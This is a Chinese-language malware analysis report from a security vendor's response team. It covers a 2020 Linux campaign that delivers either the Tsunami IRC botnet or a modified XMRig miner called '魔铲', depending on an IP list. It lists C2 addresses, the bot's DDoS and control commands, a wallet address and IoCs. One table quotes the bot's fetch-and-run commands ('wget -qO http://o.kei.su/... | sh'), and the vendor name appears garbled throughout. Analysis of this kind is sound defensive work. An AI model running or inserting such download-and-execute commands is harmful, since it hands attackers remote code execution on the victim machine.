精准投放Tsunami僵尸网络和“魔铲”挖矿木马的行动分析

时间 :  2020年04月24日  来源:  6163银河.net163.amCERT


1 概述


        近日,6163银河.net163.amCERT联合哈尔滨工业大学网络安全响应组通过网络安全监测发现了一起僵尸网络和挖矿木马事件,该事件针对Linux系统,包含服务器和智能设备。攻击者配置了一个IP列表,如果目标主机外网IP在列表中则下载运行Tsunami僵尸程序,如果目标主机外网IP不在列表中则下载运行“魔铲”挖矿木马,IP列表共8487条,全球范围内涉及政府部门、金融行业、互联网企业、媒体、运营商等多种目标,国内也有大量目标。

        6163银河.net163.amCERT分析推测,IP列表中的对应机构的特点是网络流量相对较大,因此被攻击者用来做僵尸网络的组成部分;IP列表外的,网络流量可能相对较小,因此被攻击者用来挖矿。

        被感染的Linux系统的计划任务中,存在一个每隔一段时间执行一次下载和运行update.sh脚本的任务。该脚本功能是获取计算机信息(用户id、处理器架构和公网IP),连接网络读取一个IP列表(server.txt),判断主机的公网IP是否存在于该IP列表中,如果存在则准备下载组成僵尸网络的僵尸程序运行,如果不存在则准备下载挖矿木马运行。

        6163银河.net163.amCERT分析判定,update.sh脚本下载的僵尸程序属于Tsunami家族。该僵尸网络基于Internet中继聊天(IRC)的命令控制服务器操作,在受感染设备的配置中修改DNS服务器设置,使来自物联网设备的流量被重定向到攻击者控制的恶意服务器。Tsunami僵尸网络主要使用下载器下载、利用漏洞、远程登录扫描等方式进行传播。Tsunami僵尸网络的主要功能为远程控制、DDoS攻击和其他恶意行为。

        6163银河.net163.amCERT分析判定,update.sh脚本下载的挖矿木马是攻击者基于开源的门罗币挖矿工具(XMRig)开发修改,该挖矿木马和网络流量中均含有特殊字符串“pwnRig”,6163银河.net163.amCERT将该挖矿木马命名为“魔铲”挖矿木马。

        目前,6163银河.net163.am智甲终端防御系统 (Linux版本)可实现对该挖矿木马和僵尸网络的查杀与有效防护。6163银河.net163.am智甲作为6163银河.net163.am旗下的终端防御系统,目前已经率先完成与统信操作系统UOS全平台适配兼容 ,成为统信操作系统生态伙伴。

2 事件对应的ATT&CK映射图谱


        该起事件主要是由恶意脚本所引发,针对目标特点投放僵尸程序或挖矿木马。通过对该事件进行ATT&CK映射,展示攻击者在该事件中使用的技术特点。

图 2-1事件对应的ATT&CK映射图谱

        具体ATT&CK技术行为描述表:

表 2-1 该事件的ATT&CK技术行为描述表

ATT&CK阶段/类别

具体行为

注释

执行

利用计划任务

添加计划任务,定时启动;

使用脚本

使用Linux Shell脚本;

持久化

利用计划任务

添加计划任务,定时启动;

防御规避

软件加壳

对恶意程序加壳;

发现

发现系统所有者/用户

获取系统用户id

发现进程

遍历系统进程;

发现系统信息

获取处理器架构信息;

发现系统网络连接

获取主机公网IP地址及所有网络连接的IP

命令与控制

利用常用端口

利用常用端口与C2建立连接和数据传输;

渗出

通过C2信道回传

通过C2信道回传数据;

影响

端点侧拒绝服务(DoS)

针对终端的拒绝服务攻击;

网络侧拒绝服务(DoS)

针对网络的拒绝服务攻击;

资源劫持

消耗系统资源;

3 防护建议


        针对该挖矿木马和僵尸网络6163银河.net163.am建议企业采取如下防护措施:

3.1 企业防护

        (1) 安装终端防护:安装反病毒软件,建议安装6163银河.net163.am智甲终端防御系统 Linux版本

        (2) 加强ssh口令强度:避免使用弱口令,建议使用16位或更长的密码,包括大小写字母、数字和符号在内的组合,同时避免多个服务器使用相同口令;

        (3) 及时更新补丁:建议开启自动更新功能安装系统补丁,服务器应及时更新系统补丁;

        (4) 开启日志:开启关键日志收集功能(安全日志、系统日志、错误日志、访问日志、传输日志和Cookie日志),为安全事件的追踪溯源提供基础;

        (5) 主机加固:对系统进行渗透测试及安全加固;

        (6) 部署入侵检测系统(IDS):部署流量监控类软件或设备,便于对恶意代码的发现与追踪溯源。6163银河.net163.am探海威胁检测系统 (PTD)以网络流量为检测分析对象,能精准检测出已知海量恶意代码和网络攻击活动,有效发现网络可疑行为、资产和各类未知威胁;

        (7) 6163银河.net163.am服务:若遭受恶意软件攻击,建议及时隔离被攻击主机,并保护现场等待安全工程师对计算机进行排查;6163银河.net163.am7*24小时服务热线:400-840-9234

        目前,6163银河.net163.am智甲终端防御系统 (Linux版本)可实现对该挖矿木马和僵尸网络的查杀与有效防护。

图 3-16163银河.net163.am智甲有效防护

4 样本分析


4.1 update.sh脚本分析

表 4-1 update.sh标签

病毒名称

Trojan[Downloader]/Shell.Mine

原始文件名

update.sh

MD5

6AE73CAB2D8378816AD0CB3B77EBA983

文件大小

1.35 KB(1,379 字节)

文件格式

Script/Linux.SH[:Shell]

VT首次上传时间

2020-04-14 02:30:57

VT检测结果

1 / 59

        update.sh脚本的内容如下:

图 4-1 update.sh脚本内容

        被感染的Linux系统的计划任务中,存在一个每隔一段时间执行一次下载和运行update.sh脚本的任务。该脚本功能是获取计算机信息(用户id、处理器架构和公网IP),连接网络读取一个IP列表(server.txt),判断主机的公网IP是否存在于该IP列表中,如果存在则准备下载组成僵尸网络的僵尸程序运行,如果不存在则准备下载挖矿木马运行。在准备下载僵尸程序运行前,判断主机中是否存在僵尸程序相关字符串的进程,其目的是判断主机是否已经感染了该僵尸程序;判断用户id是否为root用户,选择是否开启ssh服务;判断处理器架构,选择下载相应架构的僵尸程序运行(见表4-2),经6163银河.net163.amCERT分析工程师测试,仅存在i686和x86_64两种架构的僵尸程序。在准备下载挖矿木马运行前,判断主机网络连接中的所有IP地址是否存在攻击者正在使用的与挖矿相关的三个IP(见表4-3),其目的是判断主机是否已经感染了该挖矿木马,如果未感染则选择下载相应架构的挖矿木马运行,经6163银河.net163.amCERT分析工程师测试,仅存在i686和x86_64两种架构的挖矿木马。

        主要的处理器架构信息及对应的下载情况:

表 4-2 对应处理器架构的下载情况

处理器架构

是否能下载对应架构的恶意代码

能下载的恶意代码

i686

僵尸程序、挖矿木马

x86_64

僵尸程序、挖矿木马

i386

aarch64

mips64

mips64el

sw_64

        update.sh中的3个IP信息如下,这3个IP及曾经解析过的域名可能与矿池代理相关:

表 4-3 IP信息

IP

国家

域名

185.183.97.216

罗马尼亚布加勒斯特

xmr-v4.pwndns.pw(历史解析)

51.79.74.212

加拿大

212.ip-51-79-74.net

185.45.192.135

荷兰南荷兰省

        update.sh脚本的详细执行流程如下:

图 4-2 update.sh脚本的详细执行流程

4.2 Tsunami僵尸程序分析

表 4-4 僵尸程序标签

病毒名称

Trojan[Backdoor]/Linux.Tsunami

原始文件名

x86_64

MD5

4FF3BA68D0F154E98222BAD4DAF0F253

文件大小

184 KB(188,648 字节)

文件格式

BinExecute/Linux.ELF

加壳类型

upx

VT首次上传时间

2020-02-29 16:38:48

VT检测结果

36 / 60

        经6163银河.net163.amCERT分析判定,update.sh脚本下载的僵尸程序属于Tsunami家族。该僵尸网络基于Internet中继聊天(IRC)的命令控制服务器操作,在受感染设备的配置中修改DNS服务器设置,使来自物联网设备的流量被重定向到攻击者控制的恶意服务器。Tsunami僵尸网络主要使用下载器下载、利用漏洞、远程登录扫描等方式进行传播。Tsunami僵尸网络的主要功能为远程控制、DDoS攻击和其他恶意行为。

        Tsunami僵尸程序运行后,先判断是否为唯一实例运行,获取该进程识别码、当前系统时间和父进程PPID随机组成用户识别码。

图 4-3生成用户识别码

        该僵尸程序的上线地址由内置的IP和域名二选一和内置的7个端口号七选一组合而成。内置的IP和域名为:

        80.23.88.68

        irc.do-dear.com

        7个默认端口为:

        80、443、6667、6668、7000、8080、22

        向上线地址发送的内容格式为:

        NICK %s',0Ah 'USER %s localhost localhost:%s

        向上线地址(IRC服务器)发送连接后,等待攻击者的控制指令。Tsunami僵尸程序的主要功能为远程控制、DDoS攻击和其他恶意行为。

        远程控制的指令与功能描述如下:

表 4-5 Tsunami僵尸程序的远程控制功能的指令与功能描述

指令

描述

语法

352

设定假IP

 

376

加入频道

Send(fd,”NICK %s\n”,nick)

Send(fd,"MODE %s-xi\n",nick)

Send(fd,"JOIN %s :%s\n",chan,pass)

433

产生一个新的昵称

 

422

加入频道

Send(fd,"NICK %s\n",nick)

Send(fd,"MODE %s -xi\n",nick)

Send(fd,"JOIN %s:%s\n",chan,pass)

PRIVMSG

执行特殊指令

 

PING

发送PONG

 

NICK

从指令中取一个字符串作为昵称

 

        DDoS攻击的指令与功能描述如下:

表 4-6 Tsunami僵尸程序的DDoS攻击的指令与功能描述

指令

描述

语法

RANDOMFLOOD

ACK洪水和SYN洪水之间随机切换

RANDOMFLOOD

ACKFLOOD

ACK洪水(欺骗)

ACKFLOOD

SYNFLOOD

SYN洪水(欺骗)

SYNFLOOD

TSUNAMI

发起DDoS攻击

TSUNAMI

PAN

“高级”SYN洪水

PAN

SUDP

UDP洪水(欺骗)

SUDP

UDP

UDP洪水

UDP

NSACKFLOOD

ACK洪水

NSACKFLOOD

NSSYNFLOOD

SYN洪水

NSSYNFLOOD

STD

发起DDoS攻击

STD

UNKNOWN

发起DDoS攻击

UNKNOWN (recommended for non-root users)

KILLALL

终止DDoS攻击

 

        其他的指令与功能描述如下:

表 4-7其他的指令与相关功能描述

指令

描述

语法

DNS

识别域并将其IP发送给服务器

 

CUSTOM

执行自定义脚本(在指定的链接处)

wget -qO http://o.kei.su/custom | sh> / dev / null 2>1

 

PATCH

针对Shellshock漏洞

wget -qO http: //o.kei.su/patch | sh> / dev / null 2>1

 

BOTKILL

删除其他木马

wget -qO http://o.kei.su/botkill | sh> / dev / null 2>1

 

GETSPOOFS

获取欺骗参数

 

SPOOFS

设置用于欺骗的IPIP范围

SPOOFS

VERSION

返回后门版本

 

SERVER

将服务器更改为指令中指定的服务器

 

GET

下载指定文件

GET

IRC

将指定的IRC指令发送到服务器

IRC

HELP

显示可用指令列表

 

SH

执行一组SH指令

SH

4.3 “魔铲”挖矿木马分析

        6163银河.net163.amCERT分析判定,update.sh脚本下载的挖矿木马是攻击者基于开源的门罗币挖矿工具(XMRig)开发修改,该挖矿木马和网络流量中均含有特殊字符串“pwnRig”,6163银河.net163.amCERT将该挖矿木马命名为“魔铲”挖矿木马。“魔铲”挖矿木马连接非公共矿池,无法追踪活动情况,运行后将自身添加至计划任务中,设置为每分钟执行一次。

表 4-8 挖矿木马标签

病毒名称

RiskWare[RiskTool]/Linux.pwnrig

原始文件名

x86_64

MD5

19BD34C54B71BE9C418B5B5604410863

文件大小

2.43 MB(2,555,924 字节)

文件格式

BinExecute/Linux.ELF

加壳类型

upx

VT首次上传时间

2020-04-10 18:10:13

VT检测结果

25 / 60

        挖矿木马中含有特殊字符串“pwnRig”:

图 4-4 挖矿木马中的字符串

        网络流量中含有特殊字符串“pwnRig”:

图 4-5 挖矿程序流量分析

        挖矿木马的钱包地址:

        46VfQxKRmjSsMRYux3r6qJvxwdVCmZfUFkPqt1uUfikSSy2wJFbcDzdX2ZuH4hDzs7xS8Nsy5orNTMtQUJADuavC2vV1Rp

5 信息整理分析


5.1 IP列表(Server.txt)分析

        攻击者配置了一个IP列表,如果目标主机外网IP在列表中则下载运行Tsunami僵尸程序,如果目标主机外网IP不在列表中则下载运行“魔铲”挖矿木马,IP列表共8487条,全球范围内涉及政府部门、金融行业、互联网企业、媒体、运营商等多种目标,国内也有大量目标(2474条)。

图 5-1 IP地址对应地理位置分布情况(全球)

图 5-2 IP地址对应地理位置分布情况(国内)

5.2 update.sh中的域名关联分析

        通过6163银河.net163.am威胁情报综合分析平台关联update.sh中下载恶意代码链接的域名,发现多个与远程控制木马、挖矿木马有关的恶意域名。

图 5-36163银河.net163.am威胁情报综合分析平台域名关联分析

        上述域名关联结果列表:

表 5-1域名对应的关联结果

域名

关联结果

pw.pwndns.pw

僵尸网络、挖矿木马

pwn.pwndns.pw

远程控制木马、挖矿木马

xmr-v4.pwndns.pw

远程控制木马、挖矿木马

xmr-rx0.pwndns.pw

远程控制木马、挖矿木马

6 附录:IoCs


IoCs

6AE73CAB2D8378816AD0CB3B77EBA983

4FF3BA68D0F154E98222BAD4DAF0F253

19BD34C54B71BE9C418B5B5604410863

45F9B43EF723BC4D11A481F093969B34

259430ECA6C287D1590B2E1640C69E6D

pw.pwndns.pw

pwn.pwndns.pw

xmr-v4.pwndns.pw

xmr-rx0.pwndns.pw